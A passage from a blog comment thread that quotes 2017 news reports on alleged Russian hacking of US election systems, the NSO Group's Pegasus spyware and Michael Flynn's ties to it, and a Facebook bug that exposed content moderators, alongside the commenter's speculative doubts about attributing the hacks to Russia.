    State election officials are baffled by a Bloomberg report alleging that Russian hackers compromised the voting systems in 39 states, adding that cybersecurity firms were engaging in scare tactics to win state and local contracts to protect election systems.

    The June 13 Bloomberg story said that hackers staged incursions last year into voter databases and software systems in almost twice as many states as previously reported.

    “In Illinois, investigators found evidence that cyber intruders tried to delete or alter voter data. The hackers accessed software designed to be used by poll workers on Election Day, and in at least one state accessed a campaign finance database,” the report said.

    It cited three unnamed sources with direct knowledge of “the U.S. investigation into the matter.”

    “In all, the Russian hackers hit systems in a total of 39 states, one of them said,” the report said.

    The National Security Agency, the FBI and the U.S. Homeland Security Department all are looking into various aspects of what intelligence officials said was Russian meddling into the U.S. election systems.

    Kay Stimson, spokeswoman for the National Association of Secretaries of State, said the members of her group — which represents the chief election officials in 40 states — were taken aback by the allegation that 39 states were hacked.

    “We cannot verify any information in that report,” Stimson told Benzinga. “It has some claims that have raised some red flags. I don’t know where they’re getting it. We’re not able to assess to the credibility.”

    Cyber Security Firms Capitalizing On Russian Scare

    She said that some cybersecurity firms were engaging in scare tactics at the state and local levels.

    “There are cybersecurity firms making some wild claims,” she said. “It is a very aggressive industry.”

    Bloomberg attributed the number of states “hit” — Stimson questioned the meaning of the word — to the systems in 39 states. “It’s hard to say how they ‘hit’ 39 states,” she said.

    Homeland Security also issued a report about the Bloomberg report, saying: “While we are not going to get into specifics of activity at the state level, the vast majority of what we saw was scanning — not attempts to intrude — and unsuccessful attempts to steal data held in voter registration databases.”

    Little Doubt Russian Meddling In Election

    Despite the reaction to the Bloomberg report, there is little doubt that Russian actors attempted to access U.S. election systems. Special investigator Robert Mueller has been tasked with spearheading the investigation into whether the Trump campaign colluded with Kremlin affiliates to leak damaging emails and rig the election.

    ———-

    “State Election Officials Baffled By Report 39 States ‘Hit’ By Russian Hackers” by Mark Fritz; Benzinga; 06/15/2017

    ““We cannot verify any information in that report,” Stimson told Benzinga. “It has some claims that have raised some red flags. I don’t know where they’re getting it. We’re not able to assess to the credibility.””

    Yeah, that’s quite a rebuttal. So none of the information from that Bloomberg report can be verified. And the way the spokesperson for the association representing 40 state election chiefs puts it, this report was likely hype created by a cybersecurity industry intent on creating a panic over future Russian hackers for the purpose of basically creating demand for their services:


    Cyber Security Firms Capitalizing On Russian Scare

    She said that some cybersecurity firms were engaging in scare tactics at the state and local levels.

    “There are cybersecurity firms making some wild claims,” she said. “It is a very aggressive industry.”

    Bloomberg attributed the number of states “hit” — Stimson questioned the meaning of the word — to the systems in 39 states. “It’s hard to say how they ‘hit’ 39 states,” she said.

    And the Department of Homeland Security downplayed the report too:


    Homeland Security also issued a report about the Bloomberg report, saying: “While we are not going to get into specifics of activity at the state level, the vast majority of what we saw was scanning — not attempts to intrude — and unsuccessful attempts to steal data held in voter registration databases.”

    That certainly supports the notion that the “39 states were hacked by the Russians” was, at a minimum, an exaggeration. And when DHS talks about the “vast majority” of what they saw was “scanning”, keep in mind that “scanning” computers connected to the internet is ubiquitous and if they were using IP addresses to attribute this scanning to “Russian hackers”, if the US intelligence report on the evidence for ‘Russian hackers’ in the DNC server hack is any indication of the way IP addresses are being used to assess culpability for these state system scanning attempts, IP addresses aren’t the most compelling evidence in this case:

    Counter Punch

    Did the Russians Really Hack the DNC?

    by Gregory Elich
    January 13, 2017

    Russia, we are told, breached the servers of the Democratic National Committee (DNC), swiped emails and other documents, and released them to the public, to alter the outcome of the U.S. presidential election.

    How substantial is the evidence backing these assertions?

    Command-and-control servers remotely issue malicious commands to infected machines. Oddly, for such a key component of the operation, the command-and-control IP address in both attacks was hard-coded in the malware. This seems like another inexplicable choice, given that the point of an advanced persistent threat is to operate for an extended period without detection. A more suitable approach would be to use a Domain Name System (DNS) address, which is a decentralized computer naming system. That would provide a more covert means of identifying the command-and-control server. [13] Moreover, one would expect that address to be encrypted. Using a DNS address would also allow the command-and-control operation to easily move to another server if its location is detected, without the need to modify and reinstall the code.

    One of the IP addresses is claimed to be a “well-known APT 28” command-and-control address, while the second is said to be linked to Russian military intelligence. [14] The first address points to a server located in San Jose, California, and is operated by a server hosting service. [15] The second server is situated in Paris, France, and owned by another server hosting service. [16] Clearly, these are servers that have been compromised by hackers. It is customary for hackers to route their attacks through vulnerable computers. The IP addresses of compromised computers are widely available on the Deep Web, and typically a hacked server will be used by multiple threat actors. These two particular servers may or may not have been regularly utilized by Russian Intelligence, but they were not uniquely so used. Almost certainly, many other hackers would have used the same machines, and it cannot be said that these IP addresses uniquely identify an infiltrator. Indeed, the second IP address is associated with the common Trojan viruses Agent-APPR and Shunnael. [17]

    “Everyone is focused on attribution, but we may be missing the bigger truth,” says Joshua Croman, Director of the Cyber Statecraft Initiative at the Atlantic Council. “[T]he level of sophistication required to do this hack was so low that nearly anyone could do it.” [18]

    ———-

    “Did the Russians Really Hack the DNC?” by Gregory Elich; Counter Punch; 01/13/2017

    “One of the IP addresses is claimed to be a “well-known APT 28” command-and-control address, while the second is said to be linked to Russian military intelligence. [14] The first address points to a server located in San Jose, California, and is operated by a server hosting service. [15] The second server is situated in Paris, France, and owned by another server hosting service. [16] Clearly, these are servers that have been compromised by hackers. It is customary for hackers to route their attacks through vulnerable computers. The IP addresses of compromised computers are widely available on the Deep Web, and typically a hacked server will be used by multiple threat actors. These two particular servers may or may not have been regularly utilized by Russian Intelligence, but they were not uniquely so used. Almost certainly, many other hackers would have used the same machines, and it cannot be said that these IP addresses uniquely identify an infiltrator. Indeed, the second IP address is associated with the common Trojan viruses Agent-APPR and Shunnael. [17]

    So were IP addresses of the “scans” of these state election systems the primary evidence used to deterine that the Russian government attempted a stunningly brazen last-minute massive hacking operation against US election systems? That’s a question that needs answering now that there’s massive alarm raised over future Russian government hack attacks. Especially now that state election officials refuse to validate any part of that Bloomberg report and suggest it an instance of cybersecurity industry hype.

    Of course, if the report was true, it’s possible these state election officials are covering their backsides by downplaying the extent that their defensive measures (or lack thereof) had been breached. It’s something we can’t rule out. But note how the Bloomberg report sources claim that the “digital signatures” collected from the initial Illinois systems hack were distributed to the rest of the states and 39 of them reported finding “traces” of the same hackers. So there’s a significant conflict in the claims because the Bloomberg report sources and stance by the State election chiefs. Also don’t forget that the Bloomberg report was based on three anonymous sources, and only one of them made the claim about 39 states getting hit:

    Bloomberg Politics

    Russian Cyber Hacks on U.S. Electoral System Far Wider Than Previously Known

    by Michael Riley
    and Jordan Robertson
    June 13, 2017, 4:00 AM CDT

    * Attackers said to take measure of voting systems, databases
    * A ‘red phone’ warning to the Kremlin from Obama White House

    Russia’s cyberattack on the U.S. electoral system before Donald Trump’s election was far more widespread than has been publicly revealed, including incursions into voter databases and software systems in almost twice as many states as previously reported.

    In Illinois, investigators found evidence that cyber intruders tried to delete or alter voter data. The hackers accessed software designed to be used by poll workers on Election Day, and in at least one state accessed a campaign finance database. Details of the wave of attacks, in the summer and fall of 2016, were provided by three people with direct knowledge of the U.S. investigation into the matter. In all, the Russian hackers hit systems in a total of 39 states, one of them said.

    Illinois Database

    Illinois, which was among the states that gave the FBI and the Department of Homeland Security almost full access to investigate its systems, provides a window into the hackers’ successes and failures.

    Patient Zero

    Illinois became Patient Zero in the government’s probe, eventually leading investigators to a hacking pandemic that touched four out of every five U.S. states.

    Using evidence from the Illinois computer banks, federal agents were able to develop digital “signatures” — among them, Internet Protocol addresses used by the attackers — to spot the hackers at work.

    The signatures were then sent through Homeland Security alerts and other means to every state. Thirty-seven states reported finding traces of the hackers in various systems, according to one of the people familiar with the probe. In two others — Florida and California — those traces were found in systems run by a private contractor managing critical election systems.

    ———-

    “Russian Cyber Hacks on U.S. Electoral System Far Wider Than Previously Known” by Michael Riley and Jordan Robertson; Bloomberg Politics; 06/13/2017

    “In Illinois, investigators found evidence that cyber intruders tried to delete or alter voter data. The hackers accessed software designed to be used by poll workers on Election Day, and in at least one state accessed a campaign finance database. Details of the wave of attacks, in the summer and fall of 2016, were provided by three people with direct knowledge of the U.S. investigation into the matter. In all, the Russian hackers hit systems in a total of 39 states, one of them said.”

    So just one of the three anonymous sources actually made the “39 states were hit” claim and that appeared to be based on the “digital signatures” from the Illinois hack. And the only example signature was IP addresses:


    Using evidence from the Illinois computer banks, federal agents were able to develop digital “signatures” — among them, Internet Protocol addresses used by the attackers — to spot the hackers at work.

    The signatures were then sent through Homeland Security alerts and other means to every state. Thirty-seven states reported finding traces of the hackers in various systems, according to one of the people familiar with the probe. In two others — Florida and California — those traces were found in systems run by a private contractor managing critical election systems.

    So, all in all, it does look like the claims by State election chiefs that this report was hyped bogus do have some weight behind them. In which case we just had a high profile and highly provocative claim by someone, presumably from the cybersecurity industry, that is in serious doubt.

    This doesn’t mean that US election systems don’t have serious potential vulnerabilities to hacking. After all, if there’s one thing we’ve learned from all this is that’s spear-phishing can hit any large organization and it’s not something easily defended against by IT staff because all that’s required is an email that fools one person in an organization.

    But if there is going to be a meaningful attempt to secure US voting systems, it’s probably best that we don’t co-mingle that effort was a massive public relations campaign that portrays Russia as a country that’s aggressively attacking US election systems. Unless, of course, the Russian government did actually order this, in which case we are all in peril because it would imply the Russian government went insane and decided to start provoking the US into a serious future conflict by attacking US election systems in a manner intended to be identified as a Russian government hack. But since the evidence for that case continues to grow weaker with each questionable and/or debunked ‘revelation’ of ‘Russian hacking’, it’s going to be important to recognize that, yes, hackers, even Russian hackers potentially, could threatened US voting systems and they really do need to be better secured, but the Russian government probably isn’t the primary electoral threat Americans need to worry about going forward. After all, blatantly hacking US election systems is something that goes far beyond an Russian media campaign and treads into war territory if the Russian government does it right before the election after getting the “cyber Red Phone” call to stop it. It would be like a psyop designed to inflame tensions to dangerous levels. But for the GOP, messing with electronic voting machines is expected at this point. With no meaningful consequences. Especially now that anyone can just blame the Russians and no one will question the evidence at all apparently.

    Posted by Pterrafractyl | June 17, 2017, 4:12 pm
  7. Well look at that: As investigators explore the more than three dozen companies and individuals that Michael Flynn worked for – as a consultant, adviser, board member, or speaker – while advising the Trump campaign last year. And two of those entities are raising some extra eyebrows. Flynn was an advisory board member of Luxembourg-based OSY Technologies and consulted for the US-based private equity firm Francisco Partners. What’s so questionable about these entities? Well, Francisco Partners owns NSO Group – a secretive Israel-based cyberweapons dealer that sells advanced hacking tools to governments around the world – and OSY Technologies is an NSO Group offshoot. Flynn joined OSY in May of last year Yep, Michael Flynn worked for both the owner of an advanced cyberweapons dealer and one of its offshoots throughout the 2016 campaign:

    The Huffington Post

    Michael Flynn Worked With Foreign Cyberweapons Group That Sold Spyware Used Against Political Dissidents
    While serving as a top campaign adviser to Donald Trump, Flynn worked with firms linked to NSO Group — which develops spyware and sells it to governments.

    By Paul Blumenthal , Jessica Schulberg
    06/19/2017 03:55 pm ET | Updated

    WASHINGTON – While serving as a top campaign aide to Donald Trump, former national security adviser Michael Flynn made tens of thousands of dollars on the side advising a company that sold surveillance technology that repressive governments used to monitor activists and journalists.

    Flynn, who resigned in February after mischaracterizing his conversations with the Russian ambassador to the U.S., has already come under scrutiny for taking money from foreign outfits. Federal investigators began probing Flynn’s lobbying efforts on behalf of a Dutch company led by a businessman with ties to the Turkish government earlier this year. Flynn’s moonlighting wasn’t typical: Most people at the top level of major presidential campaigns do not simultaneously lobby for any entity, especially not foreign governments. It’s also unusual for former U.S. intelligence officials to work with foreign cybersecurity outfits.

    Nor was Flynn’s work with foreign entities while he was advising Trump limited to his Ankara deal. He earned nearly $1.5 million last year as a consultant, adviser, board member, or speaker for more than three dozen companies and individuals, according to financial disclosure forms released earlier this year.

    Two of those entities are directly linked to NSO Group, a secretive Israeli cyberweapons dealer founded by Omri Lavie and Shalev Hulio, who are rumored to have served in Unit 8200, the Israeli equivalent of the National Security Agency.

    Flynn received $40,280 last year as an advisory board member for OSY Technologies, an NSO Group offshoot based in Luxembourg, a favorite tax haven for major corporations. OSY Technologies is part of a corporate structure that runs from Israel, where NSO Group is located, through Luxembourg, the Cayman Islands, the British Virgin Islands, and the U.S.

    Flynn also worked as a consultant last year for Francisco Partners, a U.S.-based private equity firm that owns NSO Group, but he did not disclose how much he was paid. At least two Francisco Partners executives have sat on OSY’s board.

    Flynn’s financial disclosure forms do not specify the work he did for companies linked to NSO Group, and his lawyer did not respond to requests for comment. Former colleagues at Flynn’s consulting firm declined to discuss Flynn’s work with NSO Group. Executives at Francisco Partners who also sit on the OSY Technologies board did not respond to emails. Lavie, the NSO Group co-founder, told HuffPost he is “not interested in speaking to the press” and referred questions to a spokesman, who did not respond to queries.

    Many government and military officials have moved through the revolving door between government agencies and private cybersecurity companies. The major players in the cybersecurity contracting world – SAIC, Booz Allen Hamilton, CACI Federal and KeyW Corporation – all have former top government officials in leadership roles or on their boards, or have former top executives working in government.

    But it’s less common for former U.S. intelligence officials to work with foreign cybersecurity outfits. “There is a lot of opportunity in the U.S. to do this kind of work,” said Ben Johnson, a former NSA employee and the co-founder of Obsidian Security. “It’s a little bit unexpected going overseas, especially when you combine that with the fact that they’re doing things that might end up in hands of enemies of the U.S. government. It does seem questionable.”

    What is clear is that during the time Flynn was working for NSO’s Luxembourg affiliate, one of the company’s main products — a spy software sold exclusively to governments and marketed as a tool for law enforcement officials to monitor suspected criminals and terrorists — was being used to surveil political dissidents, reporters, activists, and government officials. The software, called Pegasus, allowed users to remotely break into a target’s cellular phone if the target responded to a text message.

    Last year, several people targeted by the spyware contacted Citizen Lab, a cybersecurity research team based out of the University of Toronto. With the help of experts at the computer security firm Lookout, Citizen Lab researchers were able to trace the spyware hidden in the texts back to NSO Group spyware. After Citizen Lab publicized its findings, Apple introduced patches to fix the vulnerability. It is not known how many activists in other countries were targeted and failed to report it to experts.

    NSO Group told Forbes in a statement last year that it complies with strict export control laws and only sells to authorized government agencies. “The company does NOT operate any of its systems; it is strictly a technology company,” NSO Group told Forbes.

    But once a sale is complete, foreign governments are free to do what they like with the technology.

    “The government buys [the technology] and can use it however they want,” Bill Marczak, one of the Citizen Lab researchers, told HuffPost. “They’re basically digital arms merchants.”

    The month before Flynn joined the advisory board of OSY Technologies, NSO Group opened up a new arm called WestBridge Technologies, Inc., in the D.C. region. (The company was originally registered in Delaware in 2014, but formed in Maryland in April 2016.) Led by NSO Group co-founder Lavie, WestBridge is vying for federal government contracts for NSO Group’s products. Hiring Flynn would provide NSO Group with a well-connected figure in Washington, to help get its foot in the door of the notoriously insular world of secret intelligence budgeting.

    “When you’re trying to build up your business, you need someone who has connections, someone who is seen as an authority and a legitimate presence,” Johnson said. Hiring someone with Flynn’s background in intelligence would “open up doors that they wouldn’t have had access to,” Johnson said.

    Throughout 2016, Flynn worked for a number of cybersecurity firms personally and through his consulting firm, Flynn Intel Group. In addition to his advisory board seat at OSY Technologies, he sat on the board of Adobe Systems, a large software company with Pentagon contracts, and the boards of the cybersecurity companies GreenZone Systems and HALO Privacy. (Though Flynn described himself as an Adobe advisory board member in his financial disclosure paperwork, the group said in a statement that he provided only “periodic counsel to Adobe’s public sector team.”)

    Prominent human rights activists and political dissidents have reported being targeted by NSO’s technology. On August 10, 2016, Ahmed Mansoor, an internationally recognized Emirati human rights activist, received a text message prompting him to click a link to read “new secrets” about detainees abused in UAE prisons. He got a similar text the next day. But Mansoor, who had already been repeatedly targeted by hackers, knew better than to click the links. Instead, he forwarded the messages to Citizen Lab.

    Citizen Lab soon determined that NSO Group’s malware exploited an undisclosed mobile phone vulnerability, known as a zero-day exploit, that enabled its customers – that is, foreign governments – to surveil a target’s phone after the target clicked the link included in the phishing text message. If Mansoor had clicked that link, his “phone would have become a digital spy in his pocket, capable of employing his phone camera and microphone to snoop on activity in the vicinity of the device, recording his WhatsApp and Viber calls, logging messages sent in mobile chat apps, and tracking his movements,” Citizen Lab wrote in a report.

    Across the globe in Mexico, where Coca-Cola and PepsiCo were working to repeal a tax on sodas imposed in 2014, two activists and a government-employed scientist, all of whom supported the soda tax, received a series of suspicious text messages. The texts, which became increasingly aggressive and threatening, came as the scientist and the activists were preparing a public relations campaign in support of raising the soda tax and promoting awareness of the health risks linked to sugary beverages.

    Dr. Simón Barquera, researcher at Mexico’s National Institute for Public Health, received a text on July 11, 2016, inviting him to click a link the sender said would lead him to a detailed investigation of his clinic. When Barquera didn’t follow through, the texts escalated. On the 12th, he got a text with a link to a purported court document, which the sender claimed mentioned Barquera by name. On the 13th, yet another text included a link that supposedly contained information about a funeral. The day after that, the sender wrote, “You are an asshole Simon, while you are working I’m fuc king your old lady here is a photo.” The final text Barquera received in August said that his daughter was in “grave condition” after an accident, and included a link that would supposedly tell him where she was being treated.

    Alejandro Calvillo, director of the consumer rights nonprofit El Poder del Consumidor, received a text with a link claiming to be from a man who wanted to know if Calvillo could attend the man’s father’s funeral. Another text sent to Calvillo included a link that the sender said was a viral news story that mentioned him. The final target, Luis Encarnación, a coordinator for the obesity prevention group Coalicion ContraPESO, also received a text with a link claiming that he was named in a news article.

    The targets quickly got in touch with Citizen Lab and forwarded their text messages to the researchers. In February 2017, Citizen Lab released a new report linking NSO Group’s technology to the phishing attempts targeting the pro-soda tax campaigners.

    Citizen Lab researchers have also identified texts sent last summer to Mexican journalist Rafael Cabrera that they believe were an attempt to infect his phone with NSO Group’s Pegasus spyware. Cabrera, who now works for BuzzFeed Mexico, was targeted by hackers after he broke a story revealing a potential conflict of interest with the Mexican first family and a Chinese company.

    Citizen Lab believes NSO Group may have also sold its mobile phone spying technology to many governments, including those of Kenya, Mozambique, Yemen, Qatar, Turkey, Saudi Arabia, Uzbekistan, Thailand, Morocco, Hungary, Nigeria and Bahrain.

    Working with repressive regimes is standard practice in the cyberweapons industry. The Italian surveillance malware firm Hacking Team has worked with dozens of countries known to jail dissidents, according to emails uploaded to WikiLeaks. The FBI and the Drug Enforcement Agency were among the company’s customers, according to the documents.

    Despite recent scrutiny over Mansoor’s case, NSO Group’s value has exploded in recent years. Francisco Partners bought the cyberweapons dealer in 2014 for $120 million. It is now reportedly valued at over $1 billion.

    ———-

    “Michael Flynn Worked With Foreign Cyberweapons Group That Sold Spyware Used Against Political Dissidents” by Paul Blumenthal, Jessica Schulberg; The Huffington Post; 06/19/2017

    “The month before Flynn joined the advisory board of OSY Technologies, NSO Group opened up a new arm called WestBridge Technologies, Inc., in the D.C. region. (The company was originally registered in Delaware in 2014, but formed in Maryland in April 2016.) Led by NSO Group co-founder Lavie, WestBridge is vying for federal government contracts for NSO Group’s products. Hiring Flynn would provide NSO Group with a well-connected figure in Washington, to help get its foot in the door of the notoriously insular world of secret intelligence budgeting.

    Yep, not only was Flynn working for NSO Group’s OSY Technologies and its owners at Francisco Partners, but NSO Group was also initiating plans to get more US government contracts…something that would presumably be much likelier to happen if Donald Trump won the White House and brought Flynn into the government.

    And note how NSO Group wasn’t the only cybersecurity firm Flynn was working for:


    “When you’re trying to build up your business, you need someone who has connections, someone who is seen as an authority and a legitimate presence,” Johnson said. Hiring someone with Flynn’s background in intelligence would “open up doors that they wouldn’t have had access to,” Johnson said.

    Throughout 2016, Flynn worked for a number of cybersecurity firms personally and through his consulting firm, Flynn Intel Group. In addition to his advisory board seat at OSY Technologies, he sat on the board of Adobe Systems, a large software company with Pentagon contracts, and the boards of the cybersecurity companies GreenZone Systems and HALO Privacy. (Though Flynn described himself as an Adobe advisory board member in his financial disclosure paperwork, the group said in a statement that he provided only “periodic counsel to Adobe’s public sector team.”)

    Now, in terms of assessing the significance of these business relationships, on the one hand, cybersecurity is one of the areas where one should expect the former head of the US Defense Intelligence Agency to go into after leaving government. On the other hand, we just witnessed the most hack-intensive US campaign in history and all the hacking was done in favor of Donald Trump. So, you know, some suspicions that maybe, just maybe, one of the private elite hacking firms Flynn worked for has something to do with these hacks.

    It’s important to note that, in terms of the timing, both the DNC server hacks and John Podesta’s email hack were already carried out by the time Flynn joined OSY in May (the same month the hacks were ended for both the DNC and Podesta emails), so it’s not like Flynn joined OSY and then the hacking started (not that Flynn wouldn’t have likely been in contact with them well before May). Still, due to the relative lack of sophistication required to carrying out a spear-phishing – the method behind both the DNC server hack and Podesta’s emails and, allegedly, the attempts to hack 39 state election systems a week before the election – it really is the case that almost anyone could have pulled these hacks off if they had adequate hacking skills and wanted to hide their tracks and make it look like ‘the Russians’ did it. And the NSO Group’s software specializes in create spear-phishing campaigns designed to trick people into clicking on the bad links using a variety of different tricks and insert spying malware in the victims’ systems:

    The New York Times

    Using Texts as Lures, Government Spyware Targets Mexican Journalists and Their Families

    By AZAM AHMED and NICOLE PERLROTH
    JUNE 19, 2017

    MEXICO CITY — Mexico’s most prominent human rights lawyers, journalists and anti-corruption activists have been targeted by advanced spyware sold to the Mexican government on the condition that it be used only to investigate criminals and terrorists.

    The targets include lawyers looking into the mass disappearance of 43 students, a highly respected academic who helped write anti-corruption legislation, two of Mexico’s most influential journalists and an American representing victims of sexual abuse by the police. The spying even swept up family members, including a teenage boy.

    Since 2011, at least three Mexican federal agencies have purchased about $80 million worth of spyware created by an Israeli cyberarms manufacturer. The software, known as Pegasus, infiltrates smartphones to monitor every detail of a person’s cellular life — calls, texts, email, contacts and calendars. It can even use the microphone and camera on phones for surveillance, turning a target’s smartphone into a personal bug.

    The company that makes the software, the NSO Group, says it sells the tool exclusively to governments, with an explicit agreement that it be used only to battle terrorists or the drug cartels and criminal groups that have long kidnapped and killed Mexicans.

    But according to dozens of messages examined by The New York Times and independent forensic analysts, the software has been used against some of the government’s most outspoken critics and their families, in what many view as an unprecedented effort to thwart the fight against the corruption infecting every limb of Mexican society.

    “We are the new enemies of the state,” said Juan E. Pardinas, the general director of the Mexican Institute for Competitiveness, who has pushed anti-corruption legislation. His iPhone, along with his wife’s, was targeted by the software, according to an independent analysis. “Ours is a society where democracy has been eroded,” he said.

    The deployment of sophisticated cyberweaponry against citizens is a snapshot of the struggle for Mexico itself, raising profound legal and ethical questions for a government already facing severe criticism for its human rights record. Under Mexican law, only a federal judge can authorize the surveillance of private communications, and only when officials can demonstrate a sound basis for the request.

    It is highly unlikely that the government received judicial approval to hack the phones, according to several former Mexican intelligence officials. Instead, they said, illegal surveillance is standard practice.

    “Mexican security agencies wouldn’t ask for a court order, because they know they wouldn’t get one,” said Eduardo Guerrero, a former analyst at the Center for Investigation and National Security, Mexico’s intelligence agency and one of the government agencies that use the Pegasus spyware. “I mean, how could a judge authorize surveillance of someone dedicated to the protection of human rights?”

    “There, of course, is no basis for that intervention, but that is besides the point,” he added. “No one in Mexico ever asks for permission to do so.”

    The hacking attempts were highly personalized, striking critics with messages designed to inspire fear — and get them to click on a link that would provide unfettered access to their cellphones.

    Carmen Aristegui, one of Mexico’s most famous journalists, was targeted by a spyware operator posing as the United States Embassy in Mexico, instructing her to click on a link to resolve an issue with her visa. The wife of Mr. Pardinas, the anti-corruption activist, was targeted with a message claiming to offer proof that he was having an extramarital affair.

    For others, imminent danger was the entry point, like a message warning that a truck filled with armed men was parked outside Mr. Pardinas’s home.

    “I think that any company that sells a product like this to a government would be horrified by the targets, of course, which don’t seem to fall into the traditional role of criminality,” said John Scott-Railton, a senior researcher at Citizen Lab at the Munk School of Global Affairs at the University of Toronto, which examined the hacking attempts.

    The Mexican government acknowledges gathering intelligence against legitimate suspects in accordance with the law. “As in any democratic government, to combat crime and threats against national security the Mexican government carries out intelligence operations,” it said in a statement.

    But the government “categorically denies that any of its members engages in surveillance or communications operations against defenders of human rights, journalists, anti-corruption activists or any other person without prior judicial authorization.”

    The Mexican government’s deployment of spyware has come under suspicion before, including hacking attempts on political opponents and activists fighting corporate interests in Mexico.

    Still, there is no ironclad proof that the Mexican government is responsible. The Pegasus software does not leave behind the hacker’s individual fingerprints. Even the software maker, the NSO Group, says it cannot determine who, exactly, is behind specific hacking attempts.

    But cyberexperts can verify when the software has been used on a target’s phone, leaving them with few doubts that the Mexican government, or some rogue actor within it, was involved.

    “This is pretty much as good as it gets,” said Bill Marczak, another senior researcher at Citizen Lab, who confirmed the presence of NSO code on several phones belonging to Mexican journalists and activists.

    Moreover, it is extremely unlikely that cybercriminals somehow got their hands on the software, the NSO Group says, because the technology can be used only by the government agency where it is installed.

    The company is part of a growing number of digital spying businesses that operate in a loosely regulated space. The market has picked up in recent years, particularly as companies like Apple and Facebook start encrypting their customers’ communications, making it harder for government agencies to conduct surveillance.

    Increasingly, governments have found that the only way to monitor mobile phones is by using private businesses like the NSO Group that exploit little-known vulnerabilities in smartphone software. The company has, at times, operated its businesses under different names. One of them, OSY Technologies, paid Michael T. Flynn, President Trump’s former national security adviser, more than $40,000 to be an advisory board member from May 2016 until January, according to his public financial disclosures.

    Before selling to governments, the NSO Group says, it vets their human rights records. But once the company licenses the software and installs its hardware inside intelligence and law enforcement agencies, the company says, it has no way of knowing how its spy tools are used — or whom they are used against.

    The company simply bills governments based on the total number of surveillance targets. To spy on 10 iPhone users, for example, the company charges $650,000 on top of a flat $500,000 installation fee, according to NSO marketing proposals reviewed by The New York Times.

    Even when the NSO Group learns that its software has been abused, there is only so much it can do, the company says, arguing that it cannot simply march into intelligence agencies, remove its hardware and take back its spyware.

    “When you’re selling AK-47s, you can’t control how they’ll be used once they leave the loading docks,” said Kevin Mahaffey, chief technology officer at Lookout, a mobile security company.

    Rather, the NSO Group relies on its customers to cooperate in a review, then turns over the findings to the appropriate governmental authority — in effect, leaving governments to police themselves.

    Typically, the company’s only recourse is to slowly cut off a government’s access to the spy tools over the course of months, or even years, by ceasing to provide new software patches, features and updates. But in the case of Mexico, the NSO Group has not condemned or even acknowledged any abuse, despite repeated evidence that its spy tools have been deployed against ordinary citizens and their families.

    ———-

    “Using Texts as Lures, Government Spyware Targets Mexican Journalists and Their Families” by AZAM AHMED and NICOLE PERLROTH; The New York Times; 06/19/2017

    “Increasingly, governments have found that the only way to monitor mobile phones is by using private businesses like the NSO Group that exploit little-known vulnerabilities in smartphone software. The company has, at times, operated its businesses under different names. One of them, OSY Technologies, paid Michael T. Flynn, President Trump’s former national security adviser, more than $40,000 to be an advisory board member from May 2016 until January, according to his public financial disclosures.”

    And note how even when a phone is known to be hacked by someone using the NSO Group malware after a successful spear-phishing attempt, there’s still no way to know which NSO Group client did it. Even NSO Group claims it can’t determine who did it:


    The Mexican government’s deployment of spyware has come under suspicion before, including hacking attempts on political opponents and activists fighting corporate interests in Mexico.

    Still, there is no ironclad proof that the Mexican government is responsible. The Pegasus software does not leave behind the hacker’s individual fingerprints. Even the software maker, the NSO Group, says it cannot determine who, exactly, is behind specific hacking attempts.

    But cyberexperts can verify when the software has been used on a target’s phone, leaving them with few doubts that the Mexican government, or some rogue actor within it, was involved.

    “This is pretty much as good as it gets,” said Bill Marczak, another senior researcher at Citizen Lab, who confirmed the presence of NSO code on several phones belonging to Mexican journalists and activists.

    Moreover, it is extremely unlikely that cybercriminals somehow got their hands on the software, the NSO Group says, because the technology can be used only by the government agency where it is installed.

    ““This is pretty much as good as it gets,” said Bill Marczak, another senior researcher at Citizen Lab, who confirmed the presence of NSO code on several phones belonging to Mexican journalists and activists.”

    Yes, “this” is pretty much as good as it gets in terms of establishing evidence of who was behind a hack of this nature, where “this” is “circumstantial evidence”. And that circumstantial evidence is pretty good if you’re talking about a Mexican dissident with malware traced back to the NGO Group on their phone. Sure, maybe some other NSO Group client did the hack in that circumstance but it’s a pretty good bet it was the Mexican government in such a circumstance simply due to a lack of other NSO Group clients who would care about a Mexican dissident.

    And yet for the DNC/Podesta hacks, which were also spear-phishing campaigns but against targets with a wide variety of potential enemies across the globe, the primary evidence we’re given that the Russian government was really behind the hacks was the amazingly sloppy hacker ‘mistakes’ like Cyrillic characters in the hacked document meta-data and leaving the Bitly accounts they were using to create the links used in the spear-phishing emails public so Cyber-security researchers could watch their entire hacking campaign list of targets. In other words, ‘evidence’ that could have easily be left to be found.

    So that all adds to the mystery of Michael Flynn and the potential role he played in the Trump campaign. The former head of the US military’s spy agency worked for a company that makes advanced software designed to first conduct a successful spear-phishing campaign and then gives the victim NSO Group’s special spying malware, the same kind of campaign that attacked the DNC, John Podesta, and the 39 state election systems. And yet almost no one seems to raise the question as to whether or not Flynn and his deep ties to the hacking world could have had anything to do with those high-profile hacks. Only consideration of Russian hackers is allowed. It’s a pretty mysterious mystery, although perhaps not as mysterious as the investigation.

    Posted by Pterrafractyl | June 21, 2017, 2:55 pm
  8. https://www.theguardian.com/technology/2017/jun/16/facebook-moderators-identity-exposed-terrorist-groups#img-2

    Revealed: Facebook exposed identities of moderators to suspected terrorists

    A security lapse that affected more than 1,000 workers forced one moderator into hiding – and he still lives in constant fear for his safety

    Olivia Solon in San Francisco

    Friday 16 June 2017 03.09 EDT
    First published on Friday 16 June 2017 03.00 EDT

    Facebook put the safety of its content moderators at risk after inadvertently exposing their personal details to suspected terrorist users of the social network, the Guardian has learned.

    The security lapse affected more than 1,000 workers across 22 departments at Facebook who used the company’s moderation software to review and remove inappropriate content from the platform, including sexual material, hate speech and terrorist propaganda.

    A bug in the software, discovered late last year, resulted in the personal profiles of content moderators automatically appearing as notifications in the activity log of the Facebook groups, whose administrators were removed from the platform for breaching the terms of service. The personal details of Facebook moderators were then viewable to the remaining admins of the group.

    Of the 1,000 affected workers, around 40 worked in a counter-terrorism unit based at Facebook’s European headquarters in Dublin, Ireland. Six of those were assessed to be “high priority” victims of the mistake after Facebook concluded their personal profiles were likely viewed by potential terrorists.

    The Guardian spoke to one of the six, who did not wish to be named out of concern for his and his family’s safety. The Iraqi-born Irish citizen, who is in his early twenties, fled Ireland and went into hiding after discovering that seven individuals associated with a suspected terrorist group he banned from Facebook – an Egypt-based group that backed Hamas and, he said, had members who were Islamic State sympathizers – had viewed his personal profile.

    Facebook confirmed the security breach in a statement and said it had made technical changes to “better detect and prevent these types of issues from occurring”.

    “We care deeply about keeping everyone who works for Facebook safe,” a spokesman said. “As soon as we learned about the issue, we fixed it and began a thorough investigation to learn as much as possible about what happened.”

